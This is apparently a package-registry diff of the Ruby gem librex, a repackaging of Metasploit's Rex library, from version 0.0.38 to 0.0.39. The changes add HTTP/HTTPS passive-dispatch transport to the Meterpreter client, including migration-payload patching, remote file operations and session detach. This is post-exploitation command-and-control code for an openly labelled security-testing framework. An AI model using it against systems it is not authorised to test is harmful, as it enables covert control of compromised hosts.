RubyGems - librex - Versions diffs - 0.0.38 → 0.0.39 - Mend

librex 0.0.38 → 0.0.39

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (9) hide show

data/README.markdown +1 -1
data/lib/rex/post/meterpreter/channel.rb +6 -5
data/lib/rex/post/meterpreter/client.rb +77 -32
data/lib/rex/post/meterpreter/client_core.rb +61 -14
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +19 -18
data/lib/rex/post/meterpreter/packet_dispatcher.rb +109 -14
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +22 -6
data/lib/rex/proto/http/packet.rb +1 -1
metadata +3 -3

data/README.markdown CHANGED Viewed

@@ -3,7 +3,7 @@
 A non-official re-packaging of the Rex library as a gem for easy of usage of the Metasploit REX framework in a non Metasploit application. I received permission from HDM to create this package.
 Currently based on:
-SVN Revision: 13029
+SVN Revision: 13058
 # Credits
 The Metasploit development team <http://www.metasploit.com>

data/lib/rex/post/meterpreter/channel.rb CHANGED Viewed

@@ -172,7 +172,8 @@ class Channel
 		request = Packet.create_request('core_channel_read')
 		if (length == nil)
-			length = 65536
+			# Default block size to a higher amount for passive dispatcher
+			length = self.client.passive_service ? (1024*1024) : 65536
 		end
 		request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid)
@@ -228,12 +229,12 @@ class Channel
 		# Populate the request
 		request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid)
 		cdata = request.add_tlv(TLV_TYPE_CHANNEL_DATA, buf)
 		if( ( self.flags & CHANNEL_FLAG_COMPRESS ) == CHANNEL_FLAG_COMPRESS )
-			cdata.compress = true
+			cdata.compress = true
 		end
 		request.add_tlv(TLV_TYPE_LENGTH, length)
 		request.add_tlvs(addends)
@@ -285,7 +286,7 @@ class Channel
 		return true
 	end
 	def _close(addends = nil)
 		self.class._close(self.client, self.cid, addends)
 		self.cid = nil

data/lib/rex/post/meterpreter/client.rb CHANGED Viewed

@@ -45,7 +45,7 @@ class Client
 	# Cached SSL certificate (required to scale)
 	#
 	@@ssl_ctx = nil
 	#
 	# Mutex to synchronize class-wide operations
 	#
@@ -89,38 +89,59 @@ class Client
 			extension.cleanup if extension.respond_to?( 'cleanup' )
 		end
 		dispatcher_thread.kill if dispatcher_thread
+		core.shutdown rescue nil
+		shutdown_passive_dispatcher
 	end
 	#
 	# Initializes the meterpreter client instance
 	#
 	def init_meterpreter(sock,opts={})
-		self.sock        = sock
-		self.parser      = PacketParser.new
-		self.ext         = ObjectAliases.new
-		self.ext_aliases = ObjectAliases.new
-		self.alive       = true
-		self.target_id   = opts[:target_id]
-		self.capabilities= opts[:capabilities] || {}
-		self.response_timeout =  opts[:timeout] || self.class.default_timeout
+		self.sock         = sock
+		self.parser       = PacketParser.new
+		self.ext          = ObjectAliases.new
+		self.ext_aliases  = ObjectAliases.new
+		self.alive        = true
+		self.target_id    = opts[:target_id]
+		self.capabilities = opts[:capabilities] || {}
+		self.conn_id      = opts[:conn_id]
+		self.url          = opts[:url]
+		self.ssl          = opts[:ssl]
+		self.expiration   = opts[:expiration]
+		self.comm_timeout = opts[:comm_timeout]
+		self.passive_dispatcher = opts[:passive_dispatcher]
+		self.response_timeout = opts[:timeout] || self.class.default_timeout
 		self.send_keepalives  = true
+		if opts[:passive_dispatcher]
+			initialize_passive_dispatcher
-		# Switch the socket to SSL mode and receive the hello if needed
-		if capabilities[:ssl] and not opts[:skip_ssl]
-			swap_sock_plain_to_ssl()
-		end
+			register_extension_alias('core', ClientCore.new(self))
-		register_extension_alias('core', ClientCore.new(self))
+			initialize_inbound_handlers
+			initialize_channels
-		initialize_inbound_handlers
-		initialize_channels
+			# Register the channel inbound packet handler
+			register_inbound_handler(Rex::Post::Meterpreter::Channel)
+		else
+			# Switch the socket to SSL mode and receive the hello if needed
+			if capabilities[:ssl] and not opts[:skip_ssl]
+				swap_sock_plain_to_ssl()
+			end
-		# Register the channel inbound packet handler
-		register_inbound_handler(Rex::Post::Meterpreter::Channel)
+			register_extension_alias('core', ClientCore.new(self))
-		monitor_socket
+			initialize_inbound_handlers
+			initialize_channels
+			# Register the channel inbound packet handler
+			register_inbound_handler(Rex::Post::Meterpreter::Channel)
+			monitor_socket
+		end
 	end
 	def swap_sock_plain_to_ssl
@@ -138,22 +159,22 @@ class Client
 			rescue ::Errno::EAGAIN, ::Errno::EWOULDBLOCK
 					IO::select(nil, nil, nil, 0.10)
 					retry
-			# Ruby 1.9.2+ uses IO::WaitReadable/IO::WaitWritable
+			# Ruby 1.9.2+ uses IO::WaitReadable/IO::WaitWritable
 			rescue ::Exception => e
 				if ::IO.const_defined?('WaitReadable') and e.kind_of?(::IO::WaitReadable)
 					IO::select( [ ssl ], nil, nil, 0.10 )
 					retry
 				end
-				if ::IO.const_defined?('WaitWritable') and e.kind_of?(::IO::WaitWritable)
+				if ::IO.const_defined?('WaitWritable') and e.kind_of?(::IO::WaitWritable)
 					IO::select( nil, [ ssl ], nil, 0.10 )
 					retry
 				end
 				raise e
 			end
-		end
+		end
 		self.sock.extend(Rex::Socket::SslTcp)
 		self.sock.sslsock = ssl
@@ -175,11 +196,11 @@ class Client
 	end
 	def generate_ssl_context
-		@@ssl_mutex.synchronize do
+		@@ssl_mutex.synchronize do
 		if not @@ssl_ctx
 		wlog("Generating SSL certificate for Meterpreter sessions")
 		key  = OpenSSL::PKey::RSA.new(1024){ }
 		cert = OpenSSL::X509::Certificate.new
 		cert.version = 2
@@ -223,12 +244,12 @@ class Client
 		ctx.session_id_context = Rex::Text.rand_text(16)
 		wlog("Generated SSL certificate for Meterpreter sessions")
 		@@ssl_ctx = ctx
 		end # End of if not @ssl_ctx
 		end # End of mutex.synchronize
 		@@ssl_ctx
 	end
@@ -379,6 +400,30 @@ class Client
 	# The libraries available to this meterpreter server
 	#
 	attr_accessor :capabilities
+	#
+	# The Connection ID
+	#
+	attr_accessor :conn_id
+	#
+	# The Connect URL
+	#
+	attr_accessor :url
+	#
+	# Use SSL (HTTPS)
+	#
+	attr_accessor :ssl
+	#
+	# The Session Expiration Timeout
+	#
+	attr_accessor :expiration
+	#
+	# The Communication Timeout
+	#
+	attr_accessor :comm_timeout
+	#
+	# The Passive Dispatcher
+	#
+	attr_accessor :passive_dispatcher
 protected
 	attr_accessor :parser, :ext_aliases # :nodoc:

data/lib/rex/post/meterpreter/client_core.rb CHANGED Viewed

@@ -184,7 +184,7 @@ class ClientCore < Extension
 		# We cant migrate into a process that does not exist.
 		if( process == nil )
-			raise RuntimeError, "Cannot migrate into non existant process", caller
+			raise RuntimeError, "Cannot migrate into non existent process", caller
 		end
 		# We cant migrate into a process that we are unable to open
@@ -216,13 +216,42 @@ class ClientCore < Extension
 		migrate_stager = c.new()
 		migrate_stager.datastore['DLL'] = ::File.join( Msf::Config.install_root, "data", "meterpreter", "metsrv.#{binary_suffix}" )
-		payload = migrate_stager.stage_payload
+		blob = migrate_stager.stage_payload
+		if client.passive_service
+			# Replace the transport string first (TRANSPORT_SOCKET_SSL
+			i = blob.index("METERPRETER_TRANSPORT_SSL")
+			if i
+				str = client.ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
+				blob[i, str.length] = str
+			end
+			conn_id = self.client.conn_id
+			i = blob.index("https://" + ("X" * 256))
+			if i
+				str = self.client.url
+				blob[i, str.length] = str
+			end
+			i = blob.index([0xb64be661].pack("V"))
+			if i
+				str = [ self.client.expiration ].pack("V")
+				blob[i, str.length] = str
+			end
+			i = blob.index([0xaf79257f].pack("V"))
+			if i
+				str = [ self.client.comm_timeout ].pack("V")
+				blob[i, str.length] = str
+			end
+		end
 		# Build the migration request
 		request = Packet.create_request( 'core_migrate' )
 		request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
-		request.add_tlv( TLV_TYPE_MIGRATE_LEN, payload.length )
-		request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, payload, false, client.capabilities[:zlib])
+		request.add_tlv( TLV_TYPE_MIGRATE_LEN, blob.length )
+		request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, blob, false, client.capabilities[:zlib])
 		if( process['arch'] == ARCH_X86_64 )
 			request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
 		else
@@ -232,19 +261,28 @@ class ClientCore < Extension
 		# Send the migration request (bump up the timeout to 60 seconds)
 		response = client.send_request( request, 60 )
-		# Disable the socket request monitor
-		client.monitor_stop
+		if client.passive_service
+			# Sleep for 5 seconds to allow the full handoff, this prevents
+			# the original process from stealing our loadlib requests
+			::IO.select(nil, nil, nil, 5.0)
+		else
+			# Prevent new commands from being sent while we finish migrating
+			client.comm_mutex.synchronize do
+				# Disable the socket request monitor
+				client.monitor_stop
-		###
-		# Now communicating with the new process
-		###
+				###
+				# Now communicating with the new process
+				###
-		# Renegotiate SSL over this socket
-		client.swap_sock_ssl_to_plain()
-		client.swap_sock_plain_to_ssl()
+				# Renegotiate SSL over this socket
+				client.swap_sock_ssl_to_plain()
+				client.swap_sock_plain_to_ssl()
-		# Restart the socket monitor
-		client.monitor_socket
+				# Restart the socket monitor
+				client.monitor_socket
+			end
+		end
 		# Update the meterpreter platform/suffix for loading extensions as we may have changed target architecture
 		# sf: this is kinda hacky but it works. As ruby doesnt let you un-include a module this is the simplest solution I could think of.
@@ -268,6 +306,15 @@ class ClientCore < Extension
 		return true
 	end
+	#
+	# Shuts the session down
+	#
+	def shutdown
+		request  = Packet.create_request('core_shutdown')
+		response = self.client.send_packet_wait_response(request, 15)
+		true
+	end
 end
 end; end; end

data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb CHANGED Viewed

@@ -27,27 +27,27 @@ SEPARATOR = "\\"
 Separator = "\\"
 	include Rex::Post::File
 	class << self
 		attr_accessor :client
 	end
 	#
 	# Search for files.
 	#
 	def File.search( root=nil, glob="*.*", recurse=true, timeout=-1 )
 		files = ::Array.new
 		request = Packet.create_request( 'stdapi_fs_search' )
 		root = root.chomp( '\\' ) if root
 		request.add_tlv( TLV_TYPE_SEARCH_ROOT, root )
 		request.add_tlv( TLV_TYPE_SEARCH_GLOB, glob )
 		request.add_tlv( TLV_TYPE_SEARCH_RECURSE, recurse )
-		# we set the response timeout to -1 to wait indefinatly as a
+		# we set the response timeout to -1 to wait indefinatly as a
 		# search could take an indeterminate ammount of time to complete.
 		response = client.send_request( request, timeout )
 		if( response.result == 0 )
@@ -59,10 +59,10 @@ Separator = "\\"
 				}
 			end
 		end
 		return files
 	end
 	#
 	# Returns the base name of the supplied file path to the caller.
 	#
@@ -86,7 +86,7 @@ Separator = "\\"
 		request.add_tlv(TLV_TYPE_FILE_PATH, path)
 		response = client.send_request(request)
 		return response.get_tlv_value(TLV_TYPE_FILE_PATH)
 	end
@@ -104,27 +104,27 @@ Separator = "\\"
 		r = client.fs.filestat.new(name) rescue nil
 		r ? true : false
 	end
 	#
 	# Performs a delete on the specified file.
 	#
-	def File.rm(name)
+	def File.rm(name)
 		request = Packet.create_request('stdapi_fs_delete_file')
 		request.add_tlv(TLV_TYPE_FILE_PATH,name)
 		response = client.send_request(request)
 		return response
 	end
 	#
 	# Performs a delete on the specified file.
 	#
 	def File.unlink(name)
 		return File.rm(name)
-	end
+	end
 	#
 	# Upload one or more files to the remote computer the remote
 	# directory supplied in destination.
@@ -151,7 +151,7 @@ Separator = "\\"
 		# all of the contents of the local file
 		dest_fd = client.fs.file.new(dest_file, "wb")
 		src_buf = ''
 		::File.open(src_file, 'rb') { |f|
 			src_buf = f.read(f.stat.size)
 		}
@@ -164,7 +164,7 @@ Separator = "\\"
 	end
 	#
-	# Download one or more files from the remote computer to the local
+	# Download one or more files from the remote computer to the local
 	# directory supplied in destination.
 	#
 	def File.download(destination, *src_files, &stat)
@@ -178,7 +178,7 @@ Separator = "\\"
 			end
 			download_file(dest, src)
 			stat.call('downloaded', src, dest) if (stat)
 		}
 	end
@@ -272,3 +272,4 @@ protected
 end
 end; end; end; end; end; end

data/lib/rex/post/meterpreter/packet_dispatcher.rb CHANGED Viewed

@@ -29,9 +29,9 @@ class RequestError < ArgumentError
 	# The error result that occurred, typically a windows error message.
 	attr_reader :result
 	# The error result that occurred, typically a windows error code.
-	attr_reader :code
+	attr_reader :code
 end
 ###
@@ -44,6 +44,84 @@ module PacketDispatcher
 	PacketTimeout = 600
+	##
+	#
+	# Synchronization
+	#
+	##
+	attr_accessor :comm_mutex
+	##
+	#
+	#
+	# Passive Dispatching
+	#
+	##
+	attr_accessor :passive_service, :send_queue, :recv_queue
+	def initialize_passive_dispatcher
+		self.send_queue = []
+		self.recv_queue = []
+		self.waiters    = []
+		self.alive      = true
+		self.passive_service = self.passive_dispatcher
+		self.passive_service.remove_resource("/" + self.conn_id  + "/")
+		self.passive_service.add_resource("/" + self.conn_id + "/",
+			'Proc'             => Proc.new { |cli, req| on_passive_request(cli, req) },
+			'VirtualDirectory' => true
+		)
+	end
+	def shutdown_passive_dispatcher
+		return if not self.passive_service
+		self.passive_service.remove_resource("/" + self.conn_id  + "/")
+		self.alive      = false
+		self.send_queue = []
+		self.recv_queue = []
+		self.waiters    = []
+		self.passive_service = nil
+	end
+	def on_passive_request(cli, req)
+		begin
+		resp = Rex::Proto::Http::Response.new(200, "OK")
+		resp['Content-Type'] = 'application/octet-stream'
+		resp['Connection']   = 'close'
+		# If the first 4 bytes are "RECV", return the oldest packet from the outbound queue
+		if req.body[0,4] == "RECV"
+			rpkt = send_queue.pop
+			resp.body = rpkt || ''
+			begin
+				cli.send_response(resp)
+			rescue ::Exception => e
+				send_queue.unshift(rpkt) if rpkt
+				elog("Exception sending a reply to the reader request: #{cli.inspect} #{e.class} #{e} #{e.backtrace}")
+			end
+		else
+			resp.body = ""
+			if req.body and req.body.length > 0
+				packet = Packet.new(0)
+				packet.from_r(req.body)
+				dispatch_inbound_packet(packet)
+			end
+			cli.send_response(resp)
+		end
+		# Force a closure for older WinInet implementations
+		self.passive_service.close_client( cli )
+		rescue ::Exception => e
+			elog("Exception handling request: #{cli.inspect} #{req.inspect} #{e.class} #{e} #{e.backtrace}")
+		end
+	end
 	##
 	#
 	# Transmission
@@ -62,23 +140,34 @@ module PacketDispatcher
 		raw   = packet.to_r
 		err   = nil
+		# Short-circuit send when using a passive dispatcher
+		if self.passive_service
+			send_queue.push(raw)
+			return raw.size # Lie!
+		end
 		if (raw)
-			begin
-				bytes = self.sock.write(raw)
-			rescue ::Exception => e
-				err = e
+			# This mutex is used to lock out new commands during an
+			# active migration.
+			self.comm_mutex.synchronize do
+				begin
+					bytes = self.sock.write(raw)
+				rescue ::Exception => e
+					err = e
+				end
 			end
 			if bytes.to_i == 0
 				# Mark the session itself as dead
 				self.alive = false
 				# Indicate that the dispatcher should shut down too
 				@finish = true
 				# Reraise the error to the top-level caller
-				raise err if err
+				raise err if err
 			end
 		end
@@ -89,12 +178,12 @@ module PacketDispatcher
 	# Sends a packet and waits for a timeout for the given time interval.
 	#
 	def send_request(packet, t = self.response_timeout)
 		if not t
 			send_packet(packet)
 			return nil
 		end
 		response = send_packet_wait_response(packet, t)
 		if (response == nil)
@@ -146,6 +235,12 @@ module PacketDispatcher
 	# thread context and parsers all inbound packets.
 	#
 	def monitor_socket
+		# Skip if we are using a passive dispatcher
+		return if self.passive_service
+		self.comm_mutex = ::Mutex.new
 		self.waiters = []
 		@pqueue = []
@@ -303,6 +398,7 @@ module PacketDispatcher
 			self.receiver_thread.kill
 			self.receiver_thread = nil
 		end
 		if(self.dispatcher_thread)
 			self.dispatcher_thread.kill
 			self.dispatcher_thread = nil
@@ -385,7 +481,6 @@ module PacketDispatcher
 			end
 		end
 		# Enumerate all of the inbound packet handlers until one handles
 		# the packet
 		@inbound_handlers.each { |handler|

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb CHANGED Viewed

@@ -43,6 +43,7 @@ class Console::CommandDispatcher::Core
 			"close"      => "Closes a channel",
 			"channel"    => "Displays information about active channels",
 			"exit"       => "Terminate the meterpreter session",
+			"detach"     => "Detach the meterpreter session (for http/https)",
 			"help"       => "Help menu",
 			"interact"   => "Interacts with a channel",
 			"irb"        => "Drop into irb scripting mode",
@@ -204,11 +205,26 @@ class Console::CommandDispatcher::Core
 	# Terminates the meterpreter session.
 	#
 	def cmd_exit(*args)
+		print_status("Shutting down Meterpreter...")
+		client.core.shutdown rescue nil
+		client.shutdown_passive_dispatcher
 		shell.stop
 	end
 	alias cmd_quit cmd_exit
+	#
+	# Disconnects the session
+	#
+	def cmd_detach(*args)
+		if not client.passive_service
+			print_error("Detach is only possible for non-stream sessions (http/https)")
+			return
+		end
+		client.shutdown_passive_dispatcher
+		shell.stop
+	end
 	#
 	# Interacts with a channel.
 	#
@@ -385,11 +401,11 @@ class Console::CommandDispatcher::Core
 	def cmd_run_help
 		print_line "Usage: run <script> [arguments]"
-		print_line
+		print_line
 		print_line "Executes a ruby script or Metasploit Post module in the context of the"
 		print_line "meterpreter session.  Post modules can take arguments in var=val format."
 		print_line "Example: run post/foo/bar BAZ=abcd"
-		print_line
+		print_line
 	end
 	#
@@ -535,7 +551,7 @@ class Console::CommandDispatcher::Core
 	end
 	#
-	# Show info for a given Post module.
+	# Show info for a given Post module.
 	#
 	# See also +cmd_info+ in lib/msf/ui/console/command_dispatcher/core.rb
 	#
@@ -546,10 +562,10 @@ class Console::CommandDispatcher::Core
 			cmd_info_help
 			return
 		end
 		module_name = args.shift
 		mod = client.framework.modules.create(module_name);
 		if mod.nil?
 			print_error 'Invalid module: ' << module_name
 		end
@@ -655,7 +671,7 @@ class Console::CommandDispatcher::Core
 		tab_complete_filenames(str, words)
 	end
 	def cmd_resource(*args)
 		if args.empty?
 			print(

data/lib/rex/proto/http/packet.rb CHANGED Viewed

@@ -166,7 +166,7 @@ class Packet
 	# Converts the packet to a string.
 	#
 	def to_s
-		content = self.body.dup
+		content = self.body.to_s.dup
 		# Update the content length field in the header with the body length.
 		if (content)

metadata CHANGED Viewed

@@ -2,7 +2,7 @@
 name: librex
 version: !ruby/object:Gem::Version
   prerelease:
-  version: 0.0.38
+  version: 0.0.39
 platform: ruby
 authors:
 - Metasploit Development Team
@@ -11,11 +11,11 @@ autorequire:
 bindir: bin
 cert_chain: []
-date: 2011-06-25 00:00:00 -05:00
+date: 2011-06-28 00:00:00 -05:00
 default_executable:
 dependencies: []
-description: Rex provides a variety of classes useful for security testing and exploit development. Based on SVN Revision 13029
+description: Rex provides a variety of classes useful for security testing and exploit development. Based on SVN Revision 13058
 email:
 - hdm@metasploit.com
 - jacob.hammack@hammackj.com